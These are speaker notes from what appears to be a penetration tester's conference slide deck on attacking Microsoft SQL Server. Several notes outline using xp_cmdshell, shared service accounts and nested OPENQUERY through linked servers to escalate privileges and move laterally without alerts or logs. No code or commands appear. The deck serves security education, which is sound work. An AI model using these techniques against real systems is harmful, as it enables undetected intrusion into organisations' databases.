    Speaker Information Name: ScottSutherland Job: Network & Application Pentester @ NetSPI Twitter: @_nullbind Slides: http://slideshare.net/nullbind http://slideshare.net/netspi Blogs: https://blog.netspi.com/author/scott-sutherland/ Code: https://github.com/netspi/PowerUpSQL https://github.com/nullbind

Editor's Notes

  • #5 More integrated than Oracle, db2, and mysql
  • #8 COMMON USE CASES phishing - clickonce, java applet, macro in office Sql injection download craddle
  • #9 Skip
  • #10 Skip
  • #11 Skip
  • #23 Just touch on alternative user.
  • #24 Skip
  • #45 Cornucopia of excessive privileges.
  • #46 Cornucopia of excessive privileges.
  • #47 Cornucopia of excessive privileges.
  • #48 Cornucopia of excessive privileges.
  • #49 Cornucopia of excessive privileges.
  • #50 Cornucopia of excessive privileges.
  • #51 Cornucopia of excessive privileges.
  • #52 Cornucopia of excessive privileges.
  • #53 Cornucopia of excessive privileges.
  • #54 Cornucopia of excessive privileges.
  • #55 Cornucopia of excessive privileges.
  • #56 Cornucopia of excessive privileges.
  • #57 Cornucopia of excessive privileges.
  • #58 Cornucopia of excessive privileges.
  • #59 Cornucopia of excessive privileges.
  • #60 Cornucopia of excessive privileges.
  • #62 Cornucopia of excessive privileges.
  • #70 Cornucopia of excessive privileges. You get sysadmins.
  • #71 Architecture overview.
  • #72 SQL injection.
  • #73 Scenario Database account with excessive privileges Shared service account Use xp_cmdshell to verify local command execution
  • #74  Use xp_cmdshell and OSQL to: Enumerate databases on the internal network Issues queries on remote HVA database server that is configured with the same service account. No alerts – using trusted account and non destructive native functionality No logs (or few logs) – No account creation or group modification No accountability!
  • #76 Another REALLY COOL lateral movement / privilege escalation technique.
  • #77 Architecture overview.
  • #78 Scenario No sysadmin role No excessive service account access No shared service account access Enumerate linked servers Find link to DB1 - Used to transmit marketing metrics to DB1
  • #79 Connect to DB1 (linked server) via OPENQUERY Has least privilege Enumerate linked servers Find link to HVA - Used to pull marketing metrics to DB1
  • #80 Connect to HVA (linked server) via NESTED OPENQUERY Configured with the SA account HVA could have access to other resources Nesting can continue Nested  Shared service account with excessive privs Linked database can be direct between high value and low value Other server not on the diagram Can be nested many times
  • #85 Neo4j Bloodhound pending
  • #87 Here’s the good one 
  • #92 Cornucopia of excessive privileges.
  • #107 Skip